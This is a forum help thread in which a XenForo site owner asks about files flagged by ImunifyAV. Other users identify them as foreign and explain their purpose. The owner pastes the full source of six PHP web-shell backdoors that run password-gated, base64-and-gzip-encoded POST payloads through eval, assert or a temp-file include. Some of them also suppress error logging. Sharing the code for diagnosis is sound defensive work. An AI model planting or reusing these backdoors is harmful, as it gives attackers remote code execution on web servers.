XF 2.2 HELP ImunifyAV has detected malware on the website

[rotpar]

Hi,

I just got via Plesk the notification " ImunifyAV has detected malware on the website". The installation is an upgrade from an old version of Xenforo. It indicates following files are "infected".




The question is, can I just replace these files with the latest Xenforo 2.2 files? When I look at the last edit date, then it seems the issue or infection happend years ago.

Thank you

 

[Chris D]

None of these files have ever existed in any version of XenForo. From our perspective it’s safe to delete them but you should probably try to ascertain where they came from.

 

[rotpar]

Thank you Chris,

I just checked the content of these files, no idea how they could get there. Any ideas what they intend to do/execute? I copy/paste the code below:

access.php:
<?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="NpBKjr0L2HuJDvabwoc4W#%&qmStk@sA7zf")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

threads.php:
<?php
@ini_set("log_errors", false);@ini_set("display_errors", false);error_reporting(0);if (isset($REQUEST["q"]) && $_REQUEST["q"]=="1"){echo "200".intval(phpversion()); exit;} if(isset($POST["key"]) && isset($POST["chk"]) && $_POST["key"]=="Or7SD86PIn3JfAeT4EY2#Fpks%cj@W"){$dir=dirname(__FILE);$tmp=tempnam("/tmp", "dZ6");if(!file_exists($tmp)){$tmp=tempnam($dir, "dZ6");if(!file_exists($tmp)){@assert(str_replace(array("echo ", "echo("), array("print ", "print("), gzuncompress(base64_decode($_POST["chk"]))));exit;}else{foreach(glob($dir."/dZ6*") as $f){@unlink($f);}}}else{foreach(glob("/tmp/dZ6*") as $f){@unlink($f);}}register_shutdown_function("unlink", $tmp);$f = @fopen($tmp, "w");@fwrite($f, "<?php ".gzuncompress(base64_decode($_POST["chk"])));@fclose($f);include $tmp;};?>

mainconfig.php:
<?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="NpBKjr0L2HuJDvabwoc4W#%&qmStk@sA7zf")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

buffers.php:
<?php
@ini_set("log_errors", false);@ini_set("display_errors", false);error_reporting(0);if (isset($REQUEST["q"]) && $_REQUEST["q"]=="1"){echo "200".intval(phpversion()); exit;} if(isset($POST["key"]) && isset($POST["chk"]) && $_POST["key"]=="Or7SD86PIn3JfAeT4EY2#Fpks%cj@W"){$dir=dirname(__FILE);$tmp=tempnam("/tmp", "dZ6");if(!file_exists($tmp)){$tmp=tempnam($dir, "dZ6");if(!file_exists($tmp)){@assert(str_replace(array("echo ", "echo("), array("print ", "print("), gzuncompress(base64_decode($_POST["chk"]))));exit;}else{foreach(glob($dir."/dZ6*") as $f){@unlink($f);}}}else{foreach(glob("/tmp/dZ6*") as $f){@unlink($f);}}register_shutdown_function("unlink", $tmp);$f = @fopen($tmp, "w");@fwrite($f, "<?php ".gzuncompress(base64_decode($_POST["chk"])));@fclose($f);include $tmp;};?>

editclass.php:
<?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="S1wMqK*8F6ivBT!HtkjVQUWCO92xNzLgu@ndR3fE")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

mainclass.php:
<?php if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="S1wMqK*8F6ivBT!HtkjVQUWCO92xNzLgu@ndR3fE")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

 

[VersoBit]

These files attempt to receive a payload via POST and execute a payload, in this case its uncompressing a base64 encoded payload.

I would verify your Read/Write permissions are set correctly on all of your folders, additionally, roll ANY credentials you have to your server incase they've been leaked, or discovered.

 

[rotpar]

Will do that, thank you very much!